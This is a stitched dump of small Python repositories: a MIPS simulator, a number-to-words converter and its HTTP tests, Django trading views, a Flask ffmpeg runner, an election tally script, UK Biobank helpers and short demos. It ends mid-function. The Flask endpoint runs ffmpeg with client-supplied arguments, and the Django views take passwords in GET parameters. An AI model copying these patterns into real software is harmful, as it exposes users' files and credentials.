    def __repr__(self):
        representation = "-" * 64
        representation += \
            "\nInstruction: {}\nType: {}\nOperation: {}\n".format(
                self.instruction,
                self.instruction_type,
                self.get_func()
            )
        representation += "-" * 64
        return representation
class PC:
    """Program counter: streams MipsInstruction objects from a text file
    containing one binary instruction per line."""

    def __init__(self, filename="instructions_file.txt"):
        self.file = open(filename, 'r')
        # Most recently yielded instruction; None until iteration starts.
        self.next_instruction = None

    def get_instructions(self):
        """
        Return a mips instruction object
        for each instruction in the file
        """
        for instruction in self.file.readlines():
            # FIX: the original if/else executed the identical statement in
            # both branches; collapsed to a single assignment.
            self.next_instruction = MipsInstruction(instruction)
            yield self.next_instruction
| Python | 108 | 24.824074 | 72 | /instructions.py | 0.550018 | 0.532449 |
AntLouiz/DatapathWay | refs/heads/master | import random
from utils import to_binary, extend_to_bits, to_binaryC2
class BaseMemory:
    """Minimal address -> value store backed by a per-instance dict."""

    def __init__(self):
        self.data = {}

    def set_value(self, address, value):
        """Store *value* under *address*; always returns True."""
        self.data[address] = value
        return True

    def get_value(self, address):
        """Return the value stored under *address* (KeyError if absent)."""
        return self.data[address]
class RegistersBank(BaseMemory):
    # Shared storage for ALL instances (monostate/Borg pattern): every
    # RegistersBank created anywhere reads and writes this same dict.
    data = {}

    def __new__(cls, *args, **kwargs):
        """
        Make the BaseMemory a Monostate class
        """
        # NOTE(review): the instance __dict__ is aliased to the class-level
        # `data` dict, so instance attributes and register cells share one
        # namespace. Fragile but apparently intentional — confirm before
        # changing.
        obj = super(RegistersBank, cls).__new__(cls, *args, **kwargs)
        obj.__dict__ = cls.data
        return obj

    def __init__(self):
        # Initialise the 32 MIPS registers, keyed by their 5-bit binary index.
        total_registers = 2**5
        for i in range(total_registers):
            binary_number = to_binary(i)
            # Left-pad the key to exactly 5 bits.
            if len(binary_number) < 5:
                zero_fill = 5 - len(binary_number)
                binary_number = "{}{}".format(
                    "0" * zero_fill,
                    binary_number
                )
            if i == 8:
                # Register 8 is pre-loaded with the value 16; every other
                # register starts as False (i.e. empty).
                self.data[binary_number] = extend_to_bits(to_binary(16))
            else:
                self.data[binary_number] = False
class Memory(BaseMemory):
    """Monostate main memory: 2**8 words keyed by their zero-extended binary
    address, each initialised to a random 32-bit two's-complement value."""

    # Shared storage for ALL instances (monostate/Borg pattern).
    data = {}

    def __new__(cls, *args, **kwargs):
        """
        Make the BaseMemory a Monostate class
        """
        obj = super(Memory, cls).__new__(cls, *args, **kwargs)
        # Alias the instance __dict__ to the shared class dict so every
        # Memory() object sees the same cells.
        obj.__dict__ = cls.data
        return obj

    def __init__(self):
        total_data = 2**8
        for i in range(total_data):
            # FIX: removed a dead `binary_number = to_binary(i)` assignment
            # that was immediately overwritten by the extended form below.
            binary_number = extend_to_bits(to_binary(i))
            random_number = to_binaryC2(
                random.randint(-(2**31), (2**31) - 1)
            )
            self.data[binary_number] = random_number
| Python | 79 | 22.632912 | 72 | /memory.py | 0.494111 | 0.48394 |
AntLouiz/DatapathWay | refs/heads/master | from core import CPU
# Script entry point: build the CPU model and run the loaded program.
if __name__ == "__main__":
    cpu = CPU()
    cpu.execute()
| Python | 6 | 13 | 26 | /main.py | 0.511905 | 0.511905 |
alex2060/job1 | refs/heads/main | import requests
# Smoke tests for the number-to-English HTTP service on localhost:8080.
# Each request hits /number and checks for expected substrings in the body;
# results are printed as "Passed Test" / "Failed Test".

# number=1 should render as "One" and report an "Ok" status token.
r = requests.get('http://127.0.0.1:8080/number?number=1')
#print(r.status_code)
#print(r.text)
if "One" in r.text:
    print("Passed Test")
else:
    print("Failed Test")
if "Ok" in r.text:
    print("Passed Test")
else:
    print("Failed Test")

# number=8 should render as "Eight".
r = requests.get('http://127.0.0.1:8080/number?number=8')
#print(r.status_code)
#print(r.text)
if "Eight" in r.text:
    print("Passed Test")
else:
    print("Failed Test")

# "5A" is not a number: the service must NOT say "Five" and must say "NAN"
# (note the inverted pass/fail on the first check — intentional).
r = requests.get('http://127.0.0.1:8080/number?number=5A')
#print(r.status_code)
#print(r.text)
if "Five" in r.text:
    print("Failed Test")
else:
    print("Passed Test")
if "NAN" in r.text:
    print("Passed Test")
else:
    print("Failed Test")

# An empty value must be rejected as "NAN" (not a number).
r = requests.get('http://127.0.0.1:8080/number?number=')
#print(r.status_code)
#print(r.text)
if "NAN" in r.text:
    print("Passed Test")
else:
    print("Failed Test")

# A value above the supported range must be rejected as "NTL" (number too long).
r = requests.get('http://127.0.0.1:8080/number?number=1000000000000000000000000000')
#print(r.status_code)
#print(r.text)
if "NTL" in r.text:
    print("Passed Test")
else:
    print("Failed Test")

# Missing the query parameter entirely must also yield "NAN".
r = requests.get('http://127.0.0.1:8080/number')
print(r.status_code)
print(r.text)
if "NAN" in r.text:
    print("Passed Test")
else:
    print("Failed Test")

# Passing the value in the request body (not the query string) must not be
# read as a valid number either.
r = requests.get('http://127.0.0.1:8080/number',data = {'number': '1'})
print(r.status_code)
print(r.text)
if "NAN" in r.text:
    print("Passed Test")
else:
    print("Failed Test")
| Python | 72 | 18.569445 | 84 | /pyspark/django_form_other_project/mysite/tests.py | 0.645138 | 0.572747 |
alex2060/job1 | refs/heads/main |
#https://www.vocabulary.cl/Basic/Numbers.html
###
"""
This is basic program for converting a string value of number into upto 999,999,999 into english
The program works baised on the number english convertion in the websight https://www.vocabulary.cl/Basic/Numbers.html
it is not object based as in my opinion simple operations should be single call functions not classes in order to make outside code
cleaner.
"""
#For adding a 100 to a three digent numbers
def one_hundreds(number):
    """Hundreds-digit phrase: '' for '0', otherwise '<digit word> hundred'."""
    if number == "0":
        return ""
    return "{} hundred".format(one(number))
#Converting a 1 diget string number to english
def one(number):
    """English word for a single digit character '0'-'9' (None otherwise)."""
    words = {
        "0": "zero", "1": "one", "2": "two", "3": "three", "4": "four",
        "5": "five", "6": "six", "7": "seven", "8": "eight", "9": "nine",
    }
    return words.get(number)
#Converting a 2 diget string number to english in the case where the first diget is a 1
def teens(number):
    """English word for 10-19, given the ones digit as a one-char string.

    Returns None for anything outside '0'-'9'.
    BUG FIX: the original mapped '4' to 'fifteen' instead of 'fourteen'.
    """
    words = {
        "0": "ten", "1": "eleven", "2": "twelve", "3": "thirteen",
        "4": "fourteen", "5": "fifteen", "6": "sixteen",
        "7": "seventeen", "8": "eighteen", "9": "nineteen",
    }
    return words.get(number)
#For adding dashes in between the 10s place and the 1s place for three diget number stings a helper function for the funtion tens
def ones(number):
    """Hyphenated ones-digit suffix for the tens words: '' when the digit is '0'."""
    return "" if number == "0" else "-" + one(number)
#Converting a 2 diget string number to english
def tens(number):
    """English words for a two-character digit string '00'-'99'.

    Delegates to one() for 0x, teens() for 1x, and builds
    '<prefix>[-<digit>]' otherwise; returns None for non-digit input.
    """
    high, low = number[0], number[1]
    if high == "0":
        return one(low)
    if high == "1":
        return teens(low)
    prefixes = {
        "2": "twenty", "3": "thirty", "4": "forty", "5": "fifty",
        "6": "sixty", "7": "seventy", "8": "eighty", "9": "ninety",
    }
    if high in prefixes:
        return prefixes[high] + ones(low)
#Converting a 3 diget string number to english for values greater then one thousand
def hundreds_extion(number, ening_value):
    """Convert a three-digit group and append *ening_value* (e.g. ' thousand ').

    Returns '' when the whole group is zero, so empty groups vanish from
    the final phrase.
    """
    tail = tens(number[1] + number[2])
    if number[0] != "0":
        tail = "" if tail == "zero" else " and " + tail
    phrase = one_hundreds(number[0]) + tail
    return "" if phrase == "zero" else phrase + ening_value
#Converting a 3 diget string number to english for values less then one thousand
def hundreds(number):
    """Convert a three-digit group below one thousand to English words."""
    tail = tens(number[1] + number[2])
    if number[0] != "0":
        tail = "" if tail == "zero" else " and " + tail
    return one_hundreds(number[0]) + tail
#Converting a 9 diget number to english.
def Numb_to_english(number):
    """Convert a digit string of up to nine digits to English words.

    Returns "NTL" when the (padded) input is longer than nine characters,
    "NAN" when any character is not a digit, otherwise a capitalised phrase
    ending with a period (comma/"and" placement follows vocabulary.cl).
    """
    # Left-pad the number with zeros up to nine digits.
    number_holder=len(number)
    for x in range(number_holder,9):
        number="0"+number
    # Reject anything still longer than nine digits.
    if len(number)!=9:
        return "NTL"
    # Reject non-numeric characters.
    for x in range(len(number)):
        if number[x].isnumeric() !=True:
            return "NAN"
    millons_coma=""
    thosands_coma=""
    # Words for the final three digits (ones/tens/hundreds).
    ending=hundreds(str(number[6]+number[7]+number[8]))
    # Words for the thousands group (empty string when the group is zero).
    thousand_place=hundreds_extion(number[3]+number[4]+number[5]," thousand ")
    # Words for the millions group (empty string when the group is zero).
    millons_place=hundreds_extion(number[0]+number[1]+number[2]," million ")
    # Drop a bare "zero" ending when a higher group supplies words.
    if thousand_place!="" or millons_place!="":
        if ending=="zero":
            ending=""
    # Separator after the millions group; use ", and " when the thousands
    # group has no hundreds digit.
    if millons_place!="":
        if ending!="" or thousand_place!="":
            millons_coma=", "
            if number[3]=="0":
                millons_coma=", and "
    # Separator after the thousands group, same hundreds-digit rule.
    if thousand_place!="":
        if ending!="":
            thosands_coma=", "
        # Use ", and " when the ending has no hundreds digit.
        if number[6]=="0":
            thosands_coma=", and "
    # Capitalise the first letter by rebuilding the string.
    theoutput=millons_place+millons_coma+thousand_place+thosands_coma+ending
    fist_char=theoutput[0].upper()
    final_output=""
    for x in range(1, len(theoutput) ):
        final_output+=theoutput[x]
    return fist_char+final_output+"."
| Python | 202 | 20.282179 | 132 | /pyspark/django_form_other_project/mysite/number_to_english.py | 0.671306 | 0.651821 |
alex2060/job1 | refs/heads/main | from django.shortcuts import render
from django.http import HttpResponse
import time
from django.core.files import File
# Create your views here.
import lets_convert
from django.shortcuts import render
import mysql_test
def traider(req):
    """Serve the static 'make trade' page."""
    with open("to_be_frontend_check_make_traid.html", "r") as page:
        body = page.read()
    return HttpResponse(body)
def add_traid(req):
    """Serve the static 'add user' page."""
    with open("add_user.html", "r") as page:
        body = page.read()
    return HttpResponse(body)
def compleat_traid(req):
    """Serve the static 'finish trade' page."""
    with open("to_be_frontend_check_fin_traid.html", "r") as page:
        body = page.read()
    return HttpResponse(body)
def print_convertion(req):
    """Serve the static transaction page."""
    with open("transaction.html", "r") as page:
        body = page.read()
    return HttpResponse(body)
def print_user(req):
    """Serve the static user-check page."""
    with open("to_be_frontend_check_user.html", "r") as page:
        body = page.read()
    return HttpResponse(body)
def pyspark(req):
    """Stub endpoint; always returns the same placeholder body."""
    placeholder = HttpResponse("output6")
    return placeholder
def reset(req):
    """Stub endpoint; always returns the same placeholder body."""
    placeholder = HttpResponse("output6")
    return placeholder
def _get_param(req, name, cast=None):
    """Return GET parameter *name* (optionally cast via *cast*); '' when
    missing or not convertible."""
    try:
        value = req.GET[name]
        return cast(value) if cast is not None else value
    except Exception:
        return ""


def doit(req):
    """Single dispatch endpoint for the trading demo.

    Routes on the 'action_type' GET parameter:
      adduser          -> create a user (user/email/phone/password required)
      maketraid        -> open a trade between money1 and money2
      fintraid         -> complete an existing trade by traid_id
      print_convertion -> dump completed conversions
      reset_convertion -> clear the conversion log
      Uprint           -> dump a user's account
    Missing/invalid required parameters yield 'blankN' responses; an unknown
    action echoes all parameters back.
    """
    print("in here")
    # FIX: the repeated bare try/except blocks are factored into _get_param;
    # defaults ('' on missing/invalid) are unchanged.
    action_type = _get_param(req, "action_type")
    user = _get_param(req, "user")
    email = _get_param(req, "email")
    phone = _get_param(req, "phone")
    password = _get_param(req, "password")
    traid_id = _get_param(req, "traid_id")
    request_amound = _get_param(req, "request_amound", float)
    request_type = _get_param(req, "request_type")
    send_type = _get_param(req, "send_type")
    send_amount = _get_param(req, "send_amount", float)

    # 127.0.0.1:8000/doit?action_type=adduser&user=v1&email=a&password=1&phone=1
    if action_type == "adduser":
        if password == "":
            return HttpResponse("blank1")
        if user == "":
            return HttpResponse("blank2")
        if email == "":
            return HttpResponse("blank3")
        if phone == "":
            return HttpResponse("blank4")
        out = mysql_test.makeuseremail(user, email, password)
        return HttpResponse(out)

    # 127.0.0.1:8000/doit?action_type=maketraid&user=v1&password=1&request_type=money1&send_type=money2&request_amound=1&send_amount=1
    if action_type == "maketraid":
        if password == "":
            return HttpResponse("blank1")
        if user == "":
            return HttpResponse("blank2")
        if request_type not in ["money1", "money2"]:
            # BUG FIX: the original passed three positional args to
            # HttpResponse, making the third one a non-int status code and
            # crashing the view; build a single content string instead.
            return HttpResponse("blank4 {} done".format(request_type))
        if send_type not in ["money1", "money2"]:
            return HttpResponse("blank5")
        if send_type == request_type:
            return HttpResponse("blank6")
        if request_amound == "":
            return HttpResponse("blank7")
        if send_amount == "":
            return HttpResponse("blank8")
        out = mysql_test.funtion_make_traid(user, password, request_type, request_amound, send_type, send_amount)
        return HttpResponse(out)

    # 127.0.0.1:8000/doit?action_type=fintraid&user=v2&password=1&traid_id=...
    if action_type == "fintraid":
        if password == "":
            return HttpResponse("blank1")
        if user == "":
            return HttpResponse("blank2")
        if traid_id == "":
            return HttpResponse("blank4")
        out = mysql_test.compleat_traid(user, password, traid_id)
        mysql_test.log_traid(out)
        return HttpResponse(out)

    # 127.0.0.1:8000/doit?action_type=print_convertion
    if action_type == "print_convertion":
        return HttpResponse(mysql_test.print_convertions("</br>"))

    # 127.0.0.1:8000/doit?action_type=reset_convertion
    if action_type == "reset_convertion":
        mysql_test.reset_convertion()
        return HttpResponse("done")

    # 127.0.0.1:8000/doit?action_type=Uprint&user=v2
    if action_type == "Uprint":
        return HttpResponse(mysql_test.user_acount(user, "</br>"))

    # BUG FIX: the original concatenated raw values with '+', which raised
    # TypeError whenever the float amounts were supplied; stringify each.
    summary = ",".join(str(v) for v in (
        action_type, user, password, traid_id,
        request_amound, request_type, send_type, send_amount))
    return HttpResponse(summary)
def get_from_cash(req):
    """Render the cached test page.

    BUG FIX: the original called `render_to_response`, which is never
    imported here (and was removed in Django 3.0), so the view always raised
    NameError. Use the imported `render` shortcut, which takes the request.
    """
    return render(req, './test.html')
| Python | 222 | 22.013514 | 138 | /pyspark/django_form_other_project/mysite/numb/views.py | 0.584375 | 0.563867 |
alex2060/job1 | refs/heads/main | from django.urls import path
from . import views
# Route table for the trading demo app; each endpoint maps to a view in views.py.
urlpatterns = [
    path('traider', views.traider,name='traider'),
    path('add_traid', views.add_traid,name='add_traid'),
    path('compleat_traid', views.compleat_traid,name='compleat_traid'),
    # NOTE(review): 'get_user_info' maps to views.print_convertion, same as
    # 'convertion' below — confirm it shouldn't use views.print_user instead.
    path('get_user_info', views.print_convertion,name='get_user_info'),
    path('convertion', views.print_convertion,name='convertion'),
    path('print_user', views.print_user,name='print_user'),
    path('doit', views.doit,name='doit')
]
#print_user
| Python | 15 | 32.200001 | 71 | /pyspark/django_form_other_project/mysite/numb/url.py | 0.691383 | 0.691383 |
zhuliyi10/python_demo | refs/heads/master | from mymodule import sayhello,__version__
# Call the imported greeting helper, then report the module's version string.
sayhello()
print('version:',__version__)
| Python | 4 | 20 | 41 | /models/mymodule_demo.py | 0.714286 | 0.714286 |
zhuliyi10/python_demo | refs/heads/master | def func(a, b=5, c=10):
    # Demonstrate how positional and keyword arguments bind to defaulted
    # parameters.
    print('a=', a, ' b=', b, ' c=', c)
# Positional, mixed, and keyword-only call styles:
func(2, 7)
func(2, c=23)
func(c=23,a=9)
| Python | 7 | 14 | 38 | /function/function_key.py | 0.447619 | 0.342857 |
zhuliyi10/python_demo | refs/heads/master | number = 23
# Number-guessing loop: keep prompting until the user guesses `number`.
while True:
    # Prompt (Chinese): "Enter an integer:"
    guess = int(input('请输入一个整数:'))
    if guess == number:
        # "Congratulations, you guessed it."
        print('恭喜,你猜对了。')
        break
    elif guess < number:
        # "Your guess is too low"
        print('你猜小了')
    else:
        # "Your guess is too high"
        print('你猜大了')
print('end')
| Python | 13 | 15.692307 | 34 | /if.py | 0.509174 | 0.5 |
zhuliyi10/python_demo | refs/heads/master | age = 20
# Demo of positional placeholders in str.format.
name = 'zhuly'
print('{0} was {1} years old'.format(name, age))
| Python | 3 | 23.333334 | 48 | /base.py | 0.616438 | 0.561644 |
zhuliyi10/python_demo | refs/heads/master |
def reverse(text):
    """Return *text* with its characters in reverse order."""
    return "".join(reversed(text))
def is_palindrome(text):
return text == reverse(text)
something=input('输入文本:')
if is_palindrome(something):
print("是的,这是回文")
else:
print("这不是回文")
| Python | 14 | 13.571428 | 32 | /input_output/user_input.py | 0.639024 | 0.634146 |
zhuliyi10/python_demo | refs/heads/master | def sayHello():
    # Print a fixed greeting to stdout.
    print('hello world,hello python!')
sayHello()
zhuliyi10/python_demo | refs/heads/master | def total(a=5,*numbers,**phonebook):
    print('a',a)
    # Iterate over all extra positional arguments via the tuple
    for item in numbers:
        print('num_item',item)
    # Iterate over all extra keyword arguments via the dict
    for first,second in phonebook.items():
        print(first,second)
total(10,1,2,3,Name='zhuly',age=26)
| Python | 12 | 20.5 | 43 | /function/total.py | 0.608527 | 0.577519 |
zhuliyi10/python_demo | refs/heads/master | import pickle
# Name of the file we will persist the object to
shoplistfile = 'shoplist.data'
# Shopping list (apple, mango, carrot)
shoplist = ['苹果', '芒果', '胡萝卜']
# Dump the list to the file
f = open(shoplistfile, 'wb')
pickle.dump(shoplist, f)
f.close()
del shoplist # release the shoplist variable
# Read the object back from storage
f = open(shoplistfile, 'rb')
storedlist = pickle.load(f)
f.close()
print(storedlist)
| Python | 21 | 13.142858 | 30 | /input_output/pickling.py | 0.686869 | 0.686869 |
zhuliyi10/python_demo | refs/heads/master | import sys
# Header (Chinese): "The command line arguments are:"
print('命令行参数是:')
for i in sys.argv:
    print(i)
print("python path is in ",sys.path)
zhuliyi10/python_demo | refs/heads/master |
def sayhello():
    """Print the module's greeting.

    BUG FIX: corrected the typo 'wolrd' -> 'world' in the output string.
    """
    print('hello world,hello python!')

# Module version string, importable alongside sayhello.
__version__='0.1'
| Python | 4 | 17.5 | 38 | /models/mymodule.py | 0.613333 | 0.586667 |
zhuliyi10/python_demo | refs/heads/master | poem = '''\
当工作完成时
编程是有趣的
如果想让你的工作有趣
使用Python!
'''
# Write the poem out, then read it back line by line.
f = open('poem.txt', 'w')
f.write(poem)
f.close()
f = open('poem.txt', 'r')
while(True):
    line = f.readline()
    # readline() returns '' only at EOF (blank lines still contain '\n').
    if len(line) == 0:
        break
    # Lines keep their trailing newline, so suppress print's own.
    print(line, end='')
f.close()
| Python | 19 | 11.736842 | 25 | /input_output/using_file.py | 0.541322 | 0.53719 |
akkheyy/Python-Challenge | refs/heads/master | import os
import csv
csvpath = os.path.join('election_data.csv')

# Running totals
votes = 0                  # total ballots cast
candidate_list = []        # distinct candidate names, in order of first appearance
candidate_count = []       # vote tallies, parallel to candidate_list
candidate_percent = []     # vote percentages, parallel to candidate_list

with open(csvpath, "r") as in_file:
    csv_reader = csv.reader(in_file)
    header = next(csv_reader)
    for row in csv_reader:
        # Each row is one ballot; the candidate name is in the third column.
        votes += 1
        candidate = row[2]
        # Known candidate: bump the parallel tally; new candidate: register it.
        if candidate in candidate_list:
            candidate_index = candidate_list.index(candidate)
            candidate_count[candidate_index] += 1
        else:
            candidate_list.append(candidate)
            candidate_count.append(1)

# Percentage of the total vote for each candidate.
for e in range(len(candidate_list)):
    vote_percent = round((candidate_count[e]/votes) * 100, 2)
    candidate_percent.append(vote_percent)

# BUG FIX: the original used max(candidate_list, key=candidate_list.count),
# but candidate_list holds each name exactly once, so every count was 1 and
# the "winner" was simply the first candidate seen. Pick the name whose
# entry in candidate_count is largest instead.
winning_candidate = candidate_list[candidate_count.index(max(candidate_count))]

# Print results to terminal
print("_____________________________")
print("         Election Results")
print("_____________________________")
print("Total Votes: " + str(votes))
print("_____________________________")
for e in range(len(candidate_list)):
    print(f'{candidate_list[e]} : {candidate_count[e]} votes : {candidate_percent[e]}%')
print("_____________________________")
print("Winner: " + str(winning_candidate))
print("_____________________________")

# Write the same report to Election_Results.txt.
# FIX: open via the computed outpath and close the handle (the original
# opened a hard-coded name and leaked the file object).
outpath = os.path.join("Election_Results.txt")
with open(outpath, "w") as txt_file:
    txt_file.write("_____________________________\n")
    txt_file.write("      Election Results\n")
    txt_file.write("_____________________________\n")
    txt_file.write("Total Votes: " + str(votes))
    txt_file.write("\n_____________________________\n")
    for e in range(len(candidate_list)):
        txt_file.write(f'{candidate_list[e]} : {candidate_count[e]} votes : {candidate_percent[e]}%\n')
    txt_file.write("_____________________________\n")
    txt_file.write("Winner: " + str(winning_candidate))
    txt_file.write("\n_____________________________")
| Python | 66 | 37.166668 | 168 | /PyPoll/main.py | 0.598416 | 0.594059 |
JPisaBrony/FFProcServer | refs/heads/master | from flask import Flask, request, jsonify
import json
import os
import shutil
import uuid
from subprocess import Popen, PIPE
# Flask app serving files out of ./static at the site root.
app = Flask("ffserver", static_url_path='')
# Crude single-job gate. NOTE(review): a plain module global is not safe
# under a multi-threaded/multi-worker server — confirm single-worker deploy.
processing = False
@app.route("/")
def root():
    """Serve the landing page from the static directory."""
    landing_page = app.send_static_file("index.html")
    return landing_page
@app.route("/ffmpeg", methods=['POST'])
def ffmpeg():
    """Run a client-supplied ffmpeg command in a fresh static/<uuid> folder.

    Returns {"result": "<uuid>/<last-arg>"} on success, {"error": ...} on
    failure, or a "processing..." message while another job is running.
    SECURITY NOTE: the argument list comes straight from the client; anyone
    who can POST here can drive ffmpeg arbitrarily (e.g. read/write local
    files). Flagged for review, not silently changed.
    """
    global processing
    if processing == True:
        return jsonify({ "result": "processing..." })
    processing = True
    # FIX: reset the gate in a finally block so an exception can no longer
    # leave the server stuck in "processing..." forever.
    try:
        vidID = str(uuid.uuid4())
        outDir = "static/" + vidID
        os.makedirs(outDir)
        cmd = request.json["cmd"].replace("ffmpeg ", "").replace("\"", "")
        cmdArgs = ["ffmpeg", "-loglevel", "error"]
        for c in cmd.split(" "):
            cmdArgs.append(c)
        proc = Popen(cmdArgs, cwd=outDir, stdout=PIPE, stderr=PIPE)
        stdout, stderr = proc.communicate()
        result = proc.wait()
        # FIX: ffmpeg signals failure with any nonzero exit code, not just 1.
        if result != 0:
            # FIX: os.rmdir only removes EMPTY directories; partial output
            # made cleanup itself raise. rmtree removes the whole folder.
            shutil.rmtree(outDir, ignore_errors=True)
            # FIX: stderr is bytes and not JSON-serializable; decode it.
            return jsonify({"error": stderr.decode("utf-8", "replace")})
        return jsonify({ "result": vidID + "/" + cmdArgs[-1] })
    finally:
        processing = False
# Listen on all interfaces when run directly.
if __name__ == "__main__":
    app.run(host='0.0.0.0')
| Python | 39 | 25.794872 | 70 | /ffserver.py | 0.607656 | 0.600957 |
postincredible/ukbb | refs/heads/master |
import os
import pandas as pd
import numpy as np
# Resolve the sibling 'disease' directory relative to the current working
# directory: strip the last path component from cwd and append 'disease/'.
pth = os.getcwd()
spliter = pth.split('/')[-1]
rel_var_path = pth.split(spliter)[0] + 'disease/'
# FIX: removed a bare `rel_var_path` expression statement (a notebook
# leftover) that had no effect in a module.
def load_data_by_fid(fid):
    """Load the instance-0 UKBB dataset for field id *fid*.

    Looks up the field's Type in the metadata table, then reads either the
    single-measure file (<typ><fid>i0.csv) or the multi-measure file
    (vec_<typ><fid>i0.csv, tab-separated) from the matching var_<typ> folder.
    Returns the loaded DataFrame; returns None when the Type is unrecognised.
    NOTE(review): calls os.chdir(), changing the process working directory
    as a side effect, and would raise UnboundLocalError if neither expected
    file exists in the folder.
    """
    df_tab1_i0_comp=pd.read_csv('/temp_project/ukbb/data/i0/ukb22598_i0_comp.csv')
    if int(fid) in df_tab1_i0_comp.fid.values.tolist():
        fid_num=fid
        var_type=df_tab1_i0_comp[df_tab1_i0_comp['fid']==int(fid_num)].Type.values[0]
        # Folder suffixes, parallel (index-by-index) to the full Type names.
        var_type_list=['con','cur','dat','int','tex','tim','cas','cam']
        var_type_list_full=['Continuous','Curve','Date','Integer','Text','Time','Categorical (single)', 'Categorical (multiple)']
        path_p1='/temp_project/ukbb/data/i0/var_'
        if var_type in var_type_list_full:
            vtyp=var_type_list[var_type_list_full.index(var_type)]
            loadpath=path_p1+str(vtyp)+'/'
            os.chdir(path_p1+str(vtyp))
            list_folder=os.listdir()
            # Candidate file names: single-measure vs multi-measure variant.
            pname1=str(vtyp)+str(fid_num)+'i0.csv'
            pname2='vec_'+str(vtyp)+str(fid_num)+'i0.csv'
            if pname1 in list_folder:
                print('fid ' + str(fid_num) + ' is a single-measure '+str(var_type).lower()+' variable')
                fpname=list_folder[list_folder.index(pname1)]
                df_load=pd.read_csv(loadpath+fpname)
            elif pname2 in list_folder:
                print('fid ' + str(fid_num) + ' is a multiple-measure '+str(var_type).lower()+' variable')
                fpname=list_folder[list_folder.index(pname2)]
                # Multi-measure files are tab-separated.
                df_load=pd.read_csv(loadpath+fpname, sep='\t')
            return df_load
    else:
        print('fid not found, please try again')
# Module-level UKBB variable-metadata table (fid, Type, obs_ct, Description,
# DC), loaded once at import time from a fixed absolute path.
df_tab1_i0_comp=pd.read_csv('/temp_project/ukbb/data/i0/ukb22598_i0_comp.csv')
def cd_path(path):
    """Create *path* if it does not already exist, printing what happened.

    FIX: uses os.makedirs so nested paths are created too; the original
    os.mkdir raised FileNotFoundError whenever a parent was missing.
    """
    if os.path.exists(path):
        print(path+' already exists!')
    else:
        os.makedirs(path)
        print(path+' is now created!')
def chk_unique_eid(df):
    """Print how many distinct eid values *df* contains."""
    distinct_eids = df.eid.unique()
    print(f"loaded df has unique eid count: {len(distinct_eids)}")
def search_des(keyword):
    """
    search 'keyword' related variable based on the variable description
    """
    # Case-insensitive match: lower-case both the query and the descriptions.
    klow=str(keyword).lower()
    # NOTE(review): this mutates the module-level df_tab1_i0_comp in place by
    # adding/overwriting a 'des' column — a side effect on shared state.
    df_tab1_i0_comp['des']=df_tab1_i0_comp.Description.str.lower()
    key_des=df_tab1_i0_comp[df_tab1_i0_comp.des.str.contains(klow)][['fid','Type','obs_ct','Description','DC']]
    return key_des
def related_vars(key_list, dis):
    """
    Search every keyword in *key_list*, combine and de-duplicate the hits,
    save them under <rel_var_path>/<DIS>/<dis>_related_vars_chk.csv, and
    return the combined DataFrame.

    FIX: the original duplicated the entire search/save body in both the
    "folder exists" and "folder missing" branches; only the mkdir differs,
    so it is now a single guarded call.
    NOTE(review): still calls os.chdir(), changing the process working
    directory as a side effect.
    """
    savepath1 = rel_var_path  ##### CHANGE path if needed
    savepath2 = savepath1 + str(dis).upper()
    if not os.path.exists(savepath2):
        os.mkdir(savepath2)
    os.chdir(savepath2)
    d_lst = []
    for k in key_list:
        d_lst.append(search_des(str(k).strip()))
    d_comb = pd.concat(d_lst).drop_duplicates()
    print('Searched keyword(s): '+str(key_list)+'\n'+'save '+str(dis)+'_related_vars_chk.csv file at '+str(savepath2))
    filename = str(dis)+'_related_vars_chk.csv'
    d_comb.to_csv(filename, index=None)
    return d_comb
def lst_ind(dfa_list, ind_val):
    """
    For each entry in *dfa_list* (a comma-separated code string or NaN),
    return the list of codes that begin with *ind_val*; NaN entries yield [].
    """
    prefix = str(ind_val)
    result = []
    for entry in dfa_list:
        if pd.isnull(entry):
            result.append([])
            continue
        matched = []
        for raw in entry.split(','):
            code = raw.replace(',', '')
            # partition() keeps the original edge-case behaviour: an empty
            # piece (from consecutive commas) still counts as a match.
            head, _, _ = code.partition(prefix)
            if head == '':
                matched.append(code)
        result.append(matched)
    return result
################ functions in std UKBB data ######################
def mm_gen_ind_raw(fid_int,key_code,evnt, detail=False, get_ct=False, ct_only=False):
    """
    Build per-subject indicator/count columns for one ICD *key_code* in the
    UKBB standard data for field *fid_int*.

    Columns created (named fid/ind/count + <fid>_<evnt><key_code>):
      fid...   the matched codes themselves (NaN when none matched)
      ind...   0/1 indicator of any match
      count... number of matched codes
    Return shape by flags:
      detail=True  -> full dataframe with all generated columns
      get_ct=True  -> keep the count column alongside eid/ind
      ct_only=True -> only eid + count (overrides the other flags)
    NOTE(review): assumes the code column is the SECOND column of the loaded
    dataframe (dfa.columns[1]) — confirm against the vec_* file layout.
    """
    dfc=load_data_by_fid(fid_int)
    #df_icd9m=dfc.copy()
    dfa=dfc.copy()
    # The comma-separated code strings live in the second column.
    dfa_lst=dfa[dfa.columns[1]].values.tolist()
    pre0=lst_ind(dfa_lst,str(key_code))
    gen_fid_name='fid'+str(fid_int)+'_'+str(evnt)+str(key_code)
    gen_ind_name='ind'+str(fid_int)+'_'+str(evnt)+str(key_code)
    gen_count_name='count'+str(fid_int)+'_'+str(evnt)+str(key_code)
    # Matched codes; empty match lists become NaN so .count() skips them.
    dfa[str(gen_fid_name)]=pre0
    dfa[dfa.columns[dfa.columns.get_loc(str(gen_fid_name))]]=dfa[dfa.columns[dfa.columns.get_loc(str(gen_fid_name))]].apply(lambda y: np.nan if len(y)==0 else y )
    # 0/1 indicator of any match.
    dfa[str(gen_ind_name)]=pre0
    dfa[dfa.columns[dfa.columns.get_loc(str(gen_ind_name))]]=dfa[dfa.columns[dfa.columns.get_loc(str(gen_ind_name))]].apply(lambda y: 0 if len(y)==0 else 1 )
    # Number of matched codes.
    dfa[str(gen_count_name)]=pre0
    dfa[dfa.columns[dfa.columns.get_loc(str(gen_count_name))]]=dfa[dfa.columns[dfa.columns.get_loc(str(gen_count_name))]].apply(lambda y: 0 if len(y)==0 else len(y) )
    print('fid '+str(fid_int)+' ',str(evnt)+str(key_code)+' count: '+str(dfa[dfa.columns[dfa.columns.get_loc(str(gen_fid_name))]].count())+' ind from '+str(dfa[dfa.columns[dfa.columns.get_loc(str(gen_ind_name))]].count()))
    # Narrow view: subject id plus indicator and count.
    dfb=dfa[['eid',str(gen_ind_name),str(gen_count_name)]]
    #dfb=dfa[['eid',str(gen_ind_name)]]
    if ct_only==False:
        if detail==True:
            if get_ct==True:
                return dfa
            if get_ct==False:
                return dfa.drop([str(gen_count_name)],axis=1)
        else:
            if get_ct==True:
                return dfb
            if get_ct==False:
